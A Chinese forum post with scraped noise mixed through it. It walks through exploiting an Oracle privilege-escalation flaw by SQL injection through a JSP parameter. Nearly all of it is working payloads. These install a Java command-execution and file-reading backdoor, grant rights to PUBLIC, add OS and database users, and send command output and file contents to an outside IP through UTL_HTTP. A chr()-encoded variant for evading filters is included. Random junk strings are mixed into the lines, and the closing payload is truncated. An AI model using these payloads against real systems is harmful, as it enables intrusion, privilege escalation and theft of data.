以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
% g# C% D5 O% w& e' W \; ]
1 b9 C( X$ v* R* v0 g, n& \* n# b( @ /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
, ?# h& x5 I6 M" q% q3 s, D的形式即可。(用" 'a'|| "是为了让语句返回true值)
/ n0 S% l0 l0 e语句有点长,可能要用post提交。 - z R$ s, a. j! w
以下是各个步骤: _7 I; N+ l, Q% O: ^1 ?
1.创建包
- H5 o. E- i' Z" R通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:# j+ {/ b' A+ g5 f
/xxx.jsp?id=1 and '1'<>'a'||(
% E H" `# |" E/ u7 h: Rselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''1 |7 a7 P; J! V& v' `$ Z5 `
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
7 }. ~8 [/ q* j3 x- N7 V1 L1 Wnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
" |& b* R& t$ m: ~! u; G) _$ S6 G3 r}'''';END;'';END;--','SYS',0,'1',0) from dual , L' f. Z' w- g) P7 Q
) " s* |8 M" C, O& M; r# a* G
------------------------
" c; q$ P$ b: h如果url有长度限制,可以把readFile()函数块去掉,即: ) L. ^$ ]1 t V$ X4 j* k8 E/ U3 f! x
/xxx.jsp?id=1 and '1'<>'a'||(
& R, B" N/ X3 Jselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''') b( c& A; r; H/ E) M: ~4 @
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
2 R$ K2 N; r& {4 bnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
) H$ Y# ~# _7 D& u( p, F5 E# B}'''';END;'';END;--','SYS',0,'1',0) from dual
4 M& w1 n, R7 H7 R; N1 ~)
; W/ T' i4 i; B9 T+ ?7 _& z# m) d同时把后面步骤 提到的 对readFile()的处理语句去掉。 ! l# y) @! Y" y4 B) V
------------------------------ ) i6 C* P6 t! k1 x8 b& j6 F
2.赋Java权限
; l& ~# @6 v4 Dselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
/ O5 B* g5 C3 B7 p" m% A0 \3.创建函数
- K% I4 {0 q) Z1 c3 ]# qselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
! Z( c0 j. I) [create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual
2 s7 m) y* P1 Q( d& F& N/ Hselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
7 z4 G: N$ {/ [( b0 X7 ycreate or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual% f$ Q+ ^: f2 Z- {
4.赋public执行函数的权限
' z4 i2 t& }7 V. fselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
9 e9 \/ R- n, I- E/ uselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual8 ^! \* [0 t0 X5 n
5.测试上面的几步是否成功
- {8 d9 m" c- V. y9 I- S' _# h4 Qand '1'<>'11'||( 5 j4 F5 s# j# B5 g% P$ E' T
select OBJECT_ID from all_objects where object_name ='LINXRUNCMD' + G( a# B* Q& A+ ~/ ^
)
- v/ h. S; b( jand '1'<>( 1 ]6 Q" q2 i. y% x$ _& k* T
select OBJECT_ID from all_objects where object_name ='LINXREADFILE' 2 W! R. O6 R( r
)
/ _; Z4 p+ P d6 p9 B# ]6.执行命令: ! X) f# S, ?3 q/ V9 Z, l
/xxx.jsp?id=1 and '1'<>( 9 n( _& H/ D% B% n9 O
select sys.LinxRunCMD('cmd /c net user linx /add') from dual
9 `8 P1 @1 n6 c+ D" `1 Q4 g, g6 h
( L7 ~$ V; Z6 M4 z8 W)
3 q$ K$ y2 c8 U4 G" b2 T" a/xxx.jsp?id=1 and '1'<>(
% J4 |9 p# e; Pselect sys.LinxReadFile('c:/boot.ini') from dual+ Z, f9 L6 ~' s+ [
! }$ M. W& O1 H+ z) U3 z
)
3 K) u7 @7 H" ~7 T5 t1 e, {/ [ A - _# x( z2 t. H1 N! ^+ L! Q
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。 ) ?+ b5 p$ a# D. t& M% E7 s
如果要查看运行结果可以用 union : / o7 i/ u6 z6 w
/xxx.jsp?id=1 union select sys.LinxRunCMD('cmd /c net user linx /add') from dual
( g& o! m, O ~2 Q- j C或者UTL_HTTP.request(: 1 L3 X6 V8 \+ o. k
/xxx.jsp?id=1 and '1'<>( ) J {! ^+ N4 J, H4 M
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual9 @8 o* d1 M% h; Q% }5 r5 O
) + Y2 J/ K1 l) S- f9 w j
/xxx.jsp?id=1 and '1'<>( 4 j( E0 I% g* c7 K" K& Q. f
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual. @+ n- M# A$ C* `5 I
) 8 {% k8 i) ?6 T! P8 ]7 E$ f* @
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。
, \7 Y( J" w: x3 l! O: s--------------------
* k* M4 ?( i$ Q% {% b+ {0 f6.内部变化
: p, N! y% K0 }6 A% s0 z通过以下命令可以查看all_objects表达改变: u' Y7 k' s; H0 |) d9 f
select * from all_objects where object_name like '%LINX%' or object_name like '%Linx%'% M# v, F( H" m" x. k! \$ f! J( J
7.删除我们创建的函数
( t0 x3 s2 V3 ~select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
M7 X3 G! a( B* Qdrop function LinxRunCMD '''';END;'';END;--','SYS',0,'1',0) from dual & ]& R0 C9 v; z, ~
====================================================
8 X; |1 |# z8 [# H全文结束。谨以此文赠与我的朋友。
& h8 T/ p% L( [: L* |linx . k' n0 u9 j- `( \
124829445
! z1 F* }) o& \0 l4 ?9 V; k2008.1.12
. m* _! t8 r6 [7 n; ], l) t% H7 F0 ulinyujian@bjfu.edu.cn , l; Y- Z" D5 E; l3 u, Y: S
====================================================================== 0 j; O6 k' _% Z' w
测试漏洞的另一方法:
5 i, K- e5 `- F2 b$ V/ N# w+ p. ^- Q0 q创建oracle帐号:
0 M- q6 c6 Q& T8 v/ R. vselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
* W# J) T# m- V$ p+ ECREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual- B7 K7 @) J1 i; Q8 U' j+ d
即:
$ f2 s5 O! {9 r+ Z7 S! rselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),8 N7 B& N7 `) e9 U7 D _4 Z
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
9 O" Z) N9 o0 J0 N' s) l4 a确定漏洞存在:
) F, n% c Z5 _' Q3 Y1 M# h5 T1<>(
1 B7 W: @ C8 X3 eselect user_id from all_users where username='LINXSQL' ; l }( r4 m! C
)
7 k- t; L* }- E4 S$ O) d. U; p) O给linxsql连接权限:
2 n$ Q) Z% R+ ^7 t2 |& q- Wselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''2 R% I! s, `. W- I9 ]9 _! M
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual " `' b6 r: U* o# h
删除帐号:
5 V5 T: D! |& c9 B5 Z, x2 G5 I1 O6 Mselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''; v) m# Y; \8 o
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
5 h- v s3 ^/ @1 e2 ?2 G9 N1 D======================
* i+ Q5 k# S7 h. ]9 e% M4 J以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:. k1 @3 q; p3 m/ P
1.jsp?id=1 and '1'<>( 7 q) m; n) M6 l; x
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''$ N; b* E+ W4 K$ Q! r
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end; '''';END;'';END;--','SYS',0,'1',0) from dual
7 t9 C% l" p0 Q- n5 w# s) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE1 l5 e& L% G/ ^7 \+ v
)9 X/ J7 _3 V8 J- [& R, X2 Z' i
" V, G" B* s5 ]% G/ _! m- O( O' U4 t% m: J1 d' r7 o- P
! V" B/ ]3 [/ a9 f# | |
发表于 2012-12-18 12:21:48
收藏
支持
反对